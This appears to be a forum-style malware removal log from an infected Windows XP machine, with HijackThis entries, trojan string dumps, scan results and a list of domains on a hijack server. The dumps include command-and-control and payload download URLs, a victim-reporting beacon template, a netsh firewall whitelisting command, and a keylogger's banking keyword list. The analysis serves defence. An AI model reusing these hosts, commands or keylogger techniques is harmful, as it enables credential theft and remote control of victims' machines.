C:\WINDOWS\System32\maxd64.exe
C:\WINDOWS\System32\maxd64.exe

R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings,ProxyServer = 127.0.0.1:7212 <- my proxy settings
R3 - Default URLSearchHook is missing
F3 - REG:win.ini: run=C:\WINDOWS\inet20004\services.exe
O2 - BHO: HBO Class - {5321E378-FFAD-4999-8C62-03CA8155F0B3} - C:\WINDOWS\inet20004\3.02.00.dll
O2 - BHO: IExplorerHelper Class - {E89097ED-3400-411D-9647-D368C3311C98} - C:\WINDOWS\System32\IeHelperExVS.dll
O4 - HKLM\..\Run: [System] C:\WINDOWS\System32\kernels8.exe
O4 - HKLM\..\Run: [sysvx] C:\WINDOWS\sysvx_.exe
O4 - HKLM\..\Run: [SystemLoader] C:\WINDOWS\sysldr32.exe
O4 - HKLM\..\RunServices: [SystemTools] C:\WINDOWS\System32\kernels8.exe
O4 - HKCU\..\Run: [Windows update loader] C:\Windows\xpupdate.exe
O4 - HKCU\..\Run: [WinMedia] "C:\WINDOWS\System32\vxgamet4.exe2560.exe"
O4 - HKCU\..\Run: [xp_system] C:\WINDOWS\inet20004\services.exe
O4 - HKCU\..\Run: [taskdir] C:\WINDOWS\System32\taskdir.exe
O20 - Winlogon Notify: msupdate - C:\WINDOWS\SYSTEM32\msupdate32.dll
O21 - SSODL: DCOM Server - {2C1CD3D7-86AC-4068-93BC-A02304BB8C34} - C:\WINDOWS\System32\dcom_14.dll
O23 - Service: AlfaCleanerService - AlfaCleaner.com - C:\Program Files\AlfaCleaner\ACServer.exe


==============


netsh.exe launched by c:\windows\system32\kernels8.exe

netsh firewall set allowedprogram "c:\windows\system32\kernels8.exe" enable

Files::
http://www.sophos.com/virusinfo/analyses/trojbdoorik.html


==========

Used regrun vxd file list to dig this one out :

AlfaCleanerService
ProgramFiles\AlphaCleaner\ACServer.exe

hesvc.sys



=============
:: Some files collected ::
=============



sachostx.exe
sachostp.exe
sachostc.exe
sachosts.exe

C:\WINDOWS\inet20004\services.exe
C:\WINDOWS\SYSTEM32\SERVICES.EXE





programfiles\commonfiles\vcclient


alfacleaner
ld.exe
sysldr32.exe
sysvx_.exe
comdlg64.dll
iehelperexvs.dll
maxd64.exe
maxdd.game
nttraf.dat
msdoc.exe
mspostsp.exe
msupdate32.dll
parad.raw.exe
qvxgamet2.exe
qvxgamet4.exe
sysvx.exe
taskdir.exe
vx.tll
vxgame1.exe
vxgame2.exe
vxgame3.exe
vxgame4.exe
vxgame6.exe
vxgamet1.exe
vxgamet2.exe
vxgamet3.exe
vxgamet4.exe
qvxgamet2.exe
qvxgamet4.exe
vxgame4.exe.2560.exe
winsub.xml
zlbw.dll
xpupdate.exe
win32.exe












a few more lying around ..

--------

O2 - BHO: HBO Class - {5321E378-FFAD-4999-8C62-03CA8155F0B3} - C:\WINDOWS\inet20004\3.02.00.dll

--------

IExplorerHelper Class IExplorerHelperVS Module
c:\windows\system32\iehelperexvs.dll

O2 - BHO: IExplorerHelper Class - {E89097ED-3400-411D-9647-D368C3311C98} - C:\WINDOWS\System32\IeHelperExVS.dll

----------

O4 - HKLM\..\RunServices: [SystemTools] C:\WINDOWS\System32\kernels8.exe

----------





HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify\msupdate

HKEY_CURRENT_USER\RegSaved\6BB45534C867516E6B1D181C9C18AC30\msupdate

HKEY_USERS\S-1-5-21-1801674531-926492609-839522115-1003\RegSaved\6BB45534C867516E6B1D181C9C18AC30\msupdate

O20 - Winlogon Notify: msupdate - C:\WINDOWS\SYSTEM32\msupdate32.dll



Hooks into winlogon.exe

------

HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
O21 - SSODL: DCOM Server - {2C1CD3D7-86AC-4068-93BC-A02304BB8C34} - C:\WINDOWS\System32\dcom_14.dll

------

C:\WINDOWS\System32\OLEEXT.dll

^ Hooked into every program that connects to internet - was able to unload with unlocker and delete , also overites wininet.dll

--------------
-------

Registry Entries in Run

-----------
All Users:
-----------

WindowsUpdate
C:\WINDOWS\System\svchost.exe /s

AlfaCleaner
C:\Program Files\AlfaCleaner\AlfaCleaner.exe

intell321.exe
C:\WINDOWS\System32\intell321.exe

-------

xp_system
C:\WINDOWS\SYSTEM32\SERVICES.EXE

Worm / Remote Access / IRC trojan / Destructive trojan / DoS tool
Takes mail adresses from HTML files in the Temporary Internet Files folder. It also connects to the password protected IRC channel #xtcdan, is able to send files to it and receive instructions from users on that channel. It is also updated through the Internet. The mail and the attached file claims to be coming from the antivirus company AVX. It may also destroy files on the infected computer.




--------

sachost
C:\WINDOWS\sachostx.exe

http://www.symantec.com/avcenter/venc/data...oksky.e@mm.html

SystemLoader
C:\WINDOWS\sysldr32.exe

sysvx
C:\WINDOWS\sysvx_.exe

System
C:\WINDOWS\System32\kernels8.exe




------

Current user :

-------

xp_system
C:\WINDOWS\SYSTEM32\SERVICES.EXE

--------

WinMedia
"C:\WINDOWS\System32\vxgamet4.exe2560.exe"

--------

Windows update loader
C:\Windows\XPUpdate.exe




==============

This is the controller :

C:\WINDOWS\System32\taskdir.exe

Windows update Service
Provide Windows update
http ://216.255.179.235/new/cntr/bin/lat.raw
http ://216.255.179.235/new/cntr/ab.php|
http ://216.255.179.235/new/cls/main.php

http ://69.50.171.172/n/ab.php|
http ://69.50.161.106/n/ab.php|
http ://69.50.184.194/n/ab.php

69.50.173.166

RegisterServiceProcess
Kernel32.dll
Software\Microsoft\Windows\CurrentVersion\RunServices
Software\Microsoft\Windows\CurrentVersion\Run
taskdir.dll
CMD.EXE
update
download

============================


3.02.00.dll


HKCR
Replace.HBO.1 = s 'HBO Class'
CLSID = s '{5321E378-FFAD-4999-8C62-03CA8155F0B3}'
Replace.HBO = s 'HBO Class'
CLSID = s '{5321E378-FFAD-4999-8C62-03CA8155F0B3}'
CurVer = s 'Replace.HBO.1'
NoRemove CLSID
ForceRemove {5321E378-FFAD-4999-8C62-03CA8155F0B3} = s 'HBO Class'
ProgID = s 'Replace.HBO.1'
VersionIndependentProgID = s 'Replace.HBO'
ForceRemove 'Programmable'
InprocServer32 = s '%MODULE%'
val ThreadingModel = s 'Apartment'
'TypeLib' = s '{516A36EA-AFE2-4965-A492-B198B7F7B018}'
HKLM
SOFTWARE
Microsoft
Windows
CurrentVersion
Explorer
'Browser Helper Objects'
ForceRemove {5321E378-FFAD-4999-8C62-03CA8155F0B3} = s 'BHO Class'
MSFT
stdole2.tlbWWW
3dREPLACELibWW

dmx38.tmp

InternalName
sachostc.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
LegalTrademarks
OriginalFilename
sachostc.exe
PrivateBuild
ProductName
Microsoft
Windows
Operating System
ProductVersion
SpecialBuild


FileVersion
InternalName
sachostp.exe
LegalCopyright
Microsoft Corporation. All rights reserved.
LegalTrademarks
OriginalFilename
sachostp.exe
PrivateBuild
wininet.dll
InternetGetConnectedState


explorer.exe
sachostc
sachosts
sachostw
sachostm

sachostm.exe
\msvcrl.dll
hook_kbd
un_hook_kbd
hide_get
un_hide_get
sachost.ini
\sachostc.exe
http ://proxy4u.ws:8080/update2.htm
http ://proxy4u.ws:8080/download2.exe
proxy4u.ws
http ://usproxy2u.ws:8080/update2.htm
http ://usproxy2u.ws:8080/download2.exe
SOFTWARE\Microsoft\Windows\CurrentVersion\Run
sachost
http ://%s/index.php?IP=%u.%u.%u.%u&Port1=%d&Port2=%d&ID=%x&Ver=%s&con=%s&speed=%d
netsh firewall set allowedprogram "%s" enable

NtQuerySystemInformation
QRh
uWh
NtEnumerateValueKey
uWh
NtQueryDirectoryFile
PPh
RhD
%02d.%02d.%04d %02d:%02d:%02d #0x0d#0x0a
[ENT][BKSP][SPACE][TAB][PGUP][PGDN][END][HOME][INS][DEL][UP][DOWN][RIGHT][LEFT]
\attrib.ini
---[ logs
wininet.dll
InternetReadFile
HttpOpenRequestA
HttpSendRequestA
Referer:
abbey
bank
barclay
cahoot
egg
e-gold
forex
halifax
hsbc
ktb
lloyds
log
mail
money
nationet
nationwide
natwest
nwolb
openplan
passport
password
PayPal
rbs
secret
secure
sell
sign
woolwich

GetSystemTime
GetSystemDirectoryA
GetModuleHandleA
LoadLibraryA
GetProcAddress
VirtualProtect
CloseHandle
GetWindowTextA
GetForegroundWindow
SetWindowsHookExA
wsprintfA
UnhookWindowsHookEx
CallNextHookEx
StrStrIW
strstr
msvcrl.dll
hook_kbd
un_hook_kbd
hide_get
un_hide_get

http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=0&Port2=0&ID=4fc0805e&Ver=0050&con=&speed=1
C:\WINDOWS\System32\sachosts.exe 17048
\att
rib.f
PPh
\hard.lck
C:\WINDOWS\System32\sachosts.exe
C:\WINDOWS\System32\hard.lck
C:\WINDOWS\System32
C:\Documents and Settings\spywarekiller\Desktop
http ://proxy4u.ws/index.php?IP=192.168.13.132&Port1=0&Port2=0&ID=4fc0805e&Ver=0050&con=&speed=1
C:\WINDOWS\TEMP\dmx38.tmp
netsh firewall set allowedprogram "C:\WINDOWS\System32\sachosts.exe" enable
fff3f


sachostx.exe was pretty much the same as above :


urlmon.dll
URLDownloadToFileA
WVj
svchost.exe
http ://proxy4u.ws/index.php?IP=192.168.13....50&con=&speed=0
C:\WINDOWS\System32\sachosts.exe 27572
\att
rib.f
PPh
\hard.lck
C:\WINDOWS\System32\sachosts.exe
C:\WINDOWS\System32\hard.lck
C:\WINDOWS\System32
C:\Documents and Settings\spywarekiller
http ://proxy4u.ws/index.php?IP=192.168.13....50&con=&speed=0
C:\WINDOWS\sachostx.exe
netsh firewall set allowedprogram "C:\WINDOWS\System32\sachosts.exe" enable

=========

slx.exe�������������������t

----------------

http ://game4all.biz/adv/soft1/tool.exe
C:\WINDOWS\System32\vx.tll
http ://game4all.biz/adv/soft1/search.exe
C:\WINDOWS\System32\vxh8jkdq1.exe
C:\WINDOWS\System32\vxh8jkdq2.exe
http ://game4all.biz/adv/soft1/tibs.exe
C:\WINDOWS\System32\vxh8jkdq7.exe
C:\WINDOWS\TEMP\
http ://game4all.biz/adv/soft1/proxy.exe
http ://game4all.biz/adv/083/adload.php?a1=United States&a2=Type of Processor: PENTIUM PRO or PENTIUM II/III&a3=Windows version is 5.1&a4=Build: 2600, Platform ID: 2&a5=notoutpost&table=adv83
C:\WINDOWS\System32\vxh8jkdq6.exe
C:\WINDOWS\System32
http ://game4all.biz/adv83.php?adv=83&code1=HOQ0&code2=1208
http ://game4all.biz/adv/soft1/winlogon.exe
C:\WINDOWS\System32\vxh8jkdq5.exe
%s\vx.tll
%s%s%s0%u%s?a1=%s&a2=%s&a3=%s&a4=%s&a5=%s&table=adv%u
%s%s/adv%u.php%s
%s%s%s%stibs.exe
%s%s%s%swinlogon.exe
%s%s%s%ssearch.exe
%s%s%s%sproxy.exe
%s%s%s%stool.exe
%s%s%s%snull.exe
Ukraine
Russia
%s&code2=%c%c%c%c
?adv=%u&code1=%c%c%c%c
soft1/kl/
soft1/
0bempbe/qiq
0bevojr/qiq
0bew0
hbnf5bmm/cj{
iuuq;00
notoutpost
outpost.exe
PENTIUM PRO or PENTIUM II/III
PENTIUM
Type of Processor: %s
Build: %d, Platform ID: %ld
Windows version is %d.%d
netsh firewall set allowedprogram '%s' enable
counter
%s\3.qtdfmp
%s\7.qtdfmp
%s\6.qtdfmp
%s\5.qtdfmp
%s\2.qtdfmp
%s\1.qtdfmp
%s\4.qtdfmp
kernels8.exe
%s\vxh8jkdq7.exe
%s\vxh8jkdq6.exe
%s\vxh8jkdq5.exe
%s\vxh8jkdq2.exe
%s\vxh8jkdq1.exe
DisableTaskMgr
Software\Microsoft\Windows\CurrentVersion\Policies\System
SystemTools
SOFTWARE\Microsoft\Windows\CurrentVersion\RunServices
System
Software\Microsoft\Windows\CurrentVersion\Run
%s\kernels8.exe
InternetCloseHandle
InternetReadFile
HttpQueryInfoA
InternetOpenUrlA
InternetOpenA
WININET.DLL






AlfaCleaner uninstalled from addremove programs , also had Bravesentry in program files but was damaged and not operational..




============
-------
---------
-------

Process explorer mem/string dump of :

"C:\WINDOWS\System32\dllcache\IExplore.exe"












Outpost Anti-Spyware plugin was able to restore the disabled task manager, here you can see Regrun indicating it has been restored : :





:: TrojanHunter Scan ::

Some stuff from a previous harverst the day before, but most is from this hijack.. Missed a keylogger and various files in system folders detected by spyware doctor.. The system was about 95% clean at this stage , I just wanted to see what I had missed.

No suspicious entries found
No suspicious open ports found
No trojans found in memory

HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Browser Helper Objects\\\{5321E378-FFAD-4999-8C62-03CA8155F0B3\} (matches Adware.MasterX.100)
Registry key exists: HKEY_CLASSES_ROOT\\Replace.HBO.1 (matches Adware.MasterX.100)
Registry key exists: HKEY_CLASSES_ROOT\\Replace.HBO (matches Adware.MasterX.100)

Registry key exists: HKEY_LOCAL_MACHINE\\SOFTWARE\\Classes\\CLSID\\\{5321E378-FFAD-4999-8C62-03CA8155F0B3\} (matches Adware.MasterX.100)

Registry key exists: HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\TSA (matches Adware.TargetSaver.100)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\crap\\paytime.exe (StartPage.148)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\crap\\tsinstall_4_0_4_0_b4.exe (TrojanDownloader.TSUpdate.101)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\crap march 11\\MTE3NDI6ODoxNg.exe/39Z6S.exe (TrojanDownloader.Small.153)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\crap march 11\\secure32.html (Harnig.103)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\crap march 11\\stub_113_4_0_4_0.exe/uNCawR.exe (TrojanDownloader.TSUpdate.100)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hijack march.rar/secure32.html (Harnig.103)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hijack march.rar/secure32[1].htm (Harnig.103)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hijack march.rar/paytime.rar/paytime.exe (StartPage.148)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\files.rar/MTE3NDI6ODoxNg.exe/bOaXroq.exe (TrojanDownloader.Small.153)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\files.rar/secure32.html (Harnig.103)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\files.rar/secure32[1].htm (Harnig.103)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\files.rar/stub_113_4_0_4_0.exe/8mUEeY7.exe (TrojanDownloader.TSUpdate.100)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\files.rar/tool4.exe (KillAV.100)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\files.rar/tool5.exe (KillAV.100)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\files.rar/tsinstall_4_0_4_0_b4.exe (TrojanDownloader.TSUpdate.101)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\files.rar/tsinstall_4_0_4_0_b4.rar/tsinstall_4_0_4_0_b4.exe (TrojanDownloader.TSUpdate.101)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\MTE3NDI6ODoxNg.exe/PoAa3.exe (TrojanDownloader.Small.153)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\secure32.html (Harnig.103)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\secure32[1].htm (Harnig.103)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\stub_113_4_0_4_0.exe/oK8orQoC.exe (TrojanDownloader.TSUpdate.100)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\tool4.exe (KillAV.100)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\tool5.exe (KillAV.100)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\tsinstall_4_0_4_0_b4.exe (TrojanDownloader.TSUpdate.101)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\files\\tsinstall_4_0_4_0_b4.rar/tsinstall_4_0_4_0_b4.exe (TrojanDownloader.TSUpdate.101)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\part 2\\secure32.html (Harnig.103)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\part 2\\tool1.exe (KillAV.100)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\part 2\\tool4.exe (KillAV.100)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack\\part 2\\tool5.exe (KillAV.100)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack.rar/files.rar/MTE3NDI6ODoxNg.exe/XR7.exe (TrojanDownloader.Small.153)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack.rar/files.rar/secure32.html (Harnig.103)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack.rar/files.rar/secure32[1].htm (Harnig.103)

Found trojan file: C:\\Documents and Settings\\spywarekiller\\Desktop\\LOGS\\storage\\hack.rar/files.rar/stub_113_4_0_4_0.exe/vwcZfsK.exe (TrojanDownloader.TSUpdate.100)



=========================================



Hijacks from

www.z0rder.com = 80.77.80.145

search.urlmax.org

404 domains found on 80.77.80.145

www.1100drug.biz
www.1med.info
www.2-you.info
www.2developer.com
www.4-fin.info
www.47hromosom.com
www.7-pharmacy.com
www.7-pharmacy.org
www.ab-dating.com
www.abiturient.biz
www.abler.biz
www.action-in-public.com
www.adultallfree.com
www.ae-dating.com
www.agahabaz.info
www.aglare.net
www.aglow.biz
www.agrienter.com
www.agroferma.com
www.albersx.com
www.alexdixi.com
www.alfasort.biz
www.all-rybinsk.info
www.allcheapmeds.info
www.allpills.info
www.allworldplanet.info
www.alpam.com
www.alt1.info
www.amalgama-shop.com
www.amirny.com
www.analandguys.com
www.angelicfantasy.net
www.argued2joy.info
www.artmaur.com
www.astagor.com
www.attackedass.com
www.auto-directory.net
www.awningsearch.com
www.banservice.info
www.best-about-sex.com
www.bestbooksshop.info
www.bestcarsshop.info
www.bestcheappills.com
www.besthardcoregirls.com
www.bestjob-service.net
www.bestmeds4u.info
www.bestmensmeds.info
www.bestporntop.info
www.bestrx.info
www.bestshoppro.info
www.bestworldonline.info
www.billcards.biz
www.biosupershop.info
www.bondsites.info
www.boundarik.info
www.british-credit-unions.com
www.bustyladies4u.com
www.butalbital-fioricet-caffeine.com
www.buy-phentermine-online.info
www.Buypharmshere.biz
www.Buyshoponline.info
www.Cabrera.biz
www.Caliosso.com
www.Canadafarmacy.biz
www.Cantouchme.com
www.Cddvdx.com
www.Cheapestrx.info
www.Cheapmeds4you.info
www.Cheaprx4u.info
www.Chuchuka.com
www.Cleaner2006.com
www.Coolbestworld.info
www.Creamycunt.net
www.Cutesource.info
www.Daporno.net
www.Dating--online.net
www.Debalance.com
www.Dengimaker.com
www.Diamondnet.info
www.Digitela.com
www.Discount-price-pharmacy.com
www.Dotproshop.info
www.Download-madonna-mp3.com
www.Dreampharmacy.info
www.Dsiltd.com
www.Ducklingby.com
www.E7da7.info
www.Earth-port.biz
www.Edwardso.net
www.Effect2005.info
www.Emersis.com
www.Eromaxstudio.com
www.Erostuff.com
www.Eumus.com
www.Euroworldcup.info
www.Every4free.info
www.Ezyrest.net
www.Factory-xxx.com
www.Famouspills.com
www.Fangenporn.com
www.Fat-biatch.com
www.Fekla.com
www.Fetish-secret.com
www.Fetishcharm.com
www.Findirectory.org
www.Firstshopstore.info
www.Firsttop.info
www.Fixmyscripts.com
www.Fnfpromo.com
www.Foresterad.com
www.Foxtem.com
www.Free-porn-movie-clip.com
www.Free-porno-now.com
www.Freeaction.info
www.Freehairymilf.com
www.Freematureass.com
www.Freemilfarchives.com
www.Freemilfolder.com
www.Freeporn-pix.com
www.Freeproshop.info
www.Freeshoplinks.com
www.Freesites4adults.com
www.Fucking-losers.com
www.Fuel-oil.biz
www.Funkytraf.com
www.Fx-pom.com
www.Galantweb.net
www.Galushkin.com
www.Galviever.info
www.Gamezer.com
www.Gasneftinvest.com
www.Gay--x.com
www.Gay-circle.com
www.Gayvideoportal.info
www.Gaznefteinvest.com
www.Gidropharm.com
www.Gingersnap5.com
www.Go2hotguy.com
www.Go3magick.com
www.Goodsyst.com
www.Goteleport.com
www.Greatshoppin.info
www.Greatworldtrade.info
www.Half-price-pharmacy.info
www.Hamapalesrel.info
www.Headblock.info
www.Hidesfiles.com
www.Horny-teens.biz
www.Hq-portal.com
www.Hqcd.net
www.Hyip-masterpiece.com
www.Hyipsport.com
www.Icq-shop.com
www.Infinity-speed.com
www.Intel-info.net
www.Internet-banking-commerce.com
www.Intexinvest.com
www.Invertor-tour.com
www.Investment-pool.net
www.Iq-creative.com
www.Iq-google.com
www.Iq-matrix.com
www.Iq-sms.com
www.Iq-tv.net
www.Javaforcellphone.com
www.Joannabromley.com
www.Job-tutorial.com
www.Joomla-force.com
www.Jscripts.info
www.Kaktustwist.com
www.Kissesworld.com
www.Konkursov.net
www.Kudesnyk.com
www.Kudesnyk.net
www.Laborexchange.biz
www.Ldpr18.org
www.Legocp.com
www.Lesbianbondagesex.com
www.Lesbyporn.com
www.Liderlinks.net
www.Lik1.info
www.Lingerie-queens.com
www.Livehotshows.com
www.Lovefreeporno.com
www.Lucky-go.com
www.Luminescent.biz
www.Luminous.biz
www.Magazindvd.com
www.Master-serach.com
www.Mature101.com
www.Max-expromt.com
www.Max-thumbs.com
www.Mazda-rus.com
www.Megabest.info
www.Milliondollar-homepages.net
www.Miruku.info
www.Mobilization.biz
www.Moboos.com
www.Momsanalsex.net
www.Mp3load.info
www.Mp3page.org
www.Mp3spice.com
www.Mplace.info
www.Msk-play.com
www.Murman-news.com
www.Mylinkssite.com
www.Myskp.com
www.Nadoelo.com
www.Nameforyoursite.net
www.Nastyprettygirl.net
www.Neoworldtrade.info
www.Neposhlaya.com
www.Newestoffice.com
www.Newestsoft.com
www.Newsblock.info
www.Newworldgift.info
www.Newworldglobal.info
www.Newworldshop.info
www.Ngtsoftware.com
www.Nikrazov.com
www.Nylon-adventures-xxx.com
www.Odnolko.com
www.Offensireg.info
www.Oldpornsite.info
www.Onedayfund.com
www.Oneworldsoft.info
www.Online-best-casino-gambling.com
www.Onlineusapills.com
www.Oppler.org
www.Osintsev.com
www.Pattaya-picture.com
www.Petsetshop.info
www.Pharm4all.biz
www.Pharma-cology.com
www.Pharmacy-find.info
www.Pharmbroker.biz
www.Pharmstores.info
www.Pill-store.net
www.Pills-onthe.net
www.Pillspharm.info
www.Pink-world.net
www.Playboybest.com
www.Plenton.com
www.Plexoos.com
www.Pod-kluch.com
www.Ponomarev.biz
www.Porn-xxxlife.com
www.Porngallereis.com
www.Pornodrom.net
www.Pornsearch4free.com
www.Pornstarfile.info
www.Pornxvideos.com
www.Posmotri.info
www.Postshoppen.info
www.Prikols.info
www.Pro-vizal.com
www.Prof-cto.com
www.Promomaster.org
www.meow-squirts.com
www.meow-squirts.net
www.Rapid-find.net
www.Rd-world.info
www.Realporntgp.com
www.Respiration.biz
www.Roberson.biz
www.Robodir.com
www.Ruerotic.com
www.Russia-ooo.com
www.Russwatches.com
www.Rx-store.info
www.Rx4you.info
www.Rxforyou.info
www.Saltnuts.com
www.Searchcabin.com
www.Sellurphone.com
www.Seo-promotion.org
www.Seobox.net
www.Services-dating.org
www.Sex-adult-video.com
www.Sex-galls.com
www.Sexdreamworld.com
www.Sexpicsglobal.net
www.Sexxxfilms.com
www.Sexybikinibabes.org
www.Shemalesexymovies.com
www.Shock-bbs.com
www.Shopcenterworld.info
www.Shopfunworld.info
www.Shopguideeurope.info
www.Shopmorestore.info
www.Shopnowdirect.info
www.Shopnownetwork.info
www.Shopnowplus.info
www.Shoppetstore.info
www.Shopproteam.info
www.Shopworldtech.info
www.Sivitsky.com
www.Skyworldplanet.info
www.Smartfixer.com
www.Softaspect.com
www.Softwarewin.com
www.Soma-carisoprodol-drugs.com
www.Spbsexyboy.com
www.Starshopdirect.info
www.Superporngalleries.com
www.Supershopnow.info
www.Sw-cms.com
www.Teen-set.com
www.Teeniehome.com
www.Teenssexporn.com
www.Tgpredirect.net
www.Thebestxxxhardcore.com
www.Therealporn.com
www.Theworldroom.info
www.Tommybutts.com
www.Toonsic.com
www.Topgaybears.com
www.Topresult.info
www.Tramadol-ultram-ultracet.com
www.Treg-moscow.com
www.Trinicorp.net
www.Trxporn.com
www.Udasha.com
www.Ufa-vision.net
www.Umkoball.com
www.Unixt.net
www.Urstroysouz.org
www.Usameds4u.info
www.Usamedsonline.info
www.Usaworldsite.info
www.Used-car-california.com
www.Usefulsolution.com
www.Usergate.org
www.Vip-find.com
www.Virginteenporn.net
www.Vitaly.org
www.Vitoplan.com
www.W-dating.com
www.Warezwm.com
www.Web-direct-zv.com
www.Webcash-net.com
www.West-east.biz
www.Whitefeed.com
www.Wirelessshopnow.info
www.Worldboxglobal.info
www.Worldgloballink.info
www.Worldglobalsales.info
www.Worldshopguide.info
www.Worldstockdirect.info
www.Worldtradeeasy.info
www.Worldtradepro.info
www.Worldtradingcup.info
www.Www-problem.net
www.X2zoom.com
www.Xehtai.com
www.Xstyles.net
www.Xxx-nude-galleries.com
www.Xxx-seek.net
www.Xxx-tgp.org
www.Xxxgolinks.com
www.Youcansearch.com
www.Yourmedsshop.info
www.Yourshopguide.info
www.Yourshoppig.info
www.Yourworldclass.info
www.Yourworldusa.info
www.Z-metric.com
www.Z0rder.com
www.All999drugs.com
www.Allmeds.info
www.Bestgift.biz
www.Bestshoprx.info
www.Bluepills.info
www.Canamedz.info
www.Cheaprxbuyers.com
www.Edpills.info
www.Edshop.biz
www.Erotpops.com
www.Eve-cash.com
www.Getpillsonline.net
www.Greatpharm.info
www.Meds2u.info
www.Meds4health.info
www.Medsonlinne.info
www.Medsshop.info
www.Menheallth.info
www.Menhealt.info
www.Mycialis.info
www.Onlyhot.info
www.Penny-sex.com
www.Pharm4you.info
www.Pillmoney.biz
www.Rxshop.info
www.Seenowpics.com
www.Tds-system.info
www.Thehealthcare.info
www.Thehealz.info
www.Themedsonline.info
www.Themedz.biz
www.Viagranow.info
www.Webaltair.net
www.Yermeds.info
www.Yourtabs.info
www.Zdravshop.com


--------------------------------------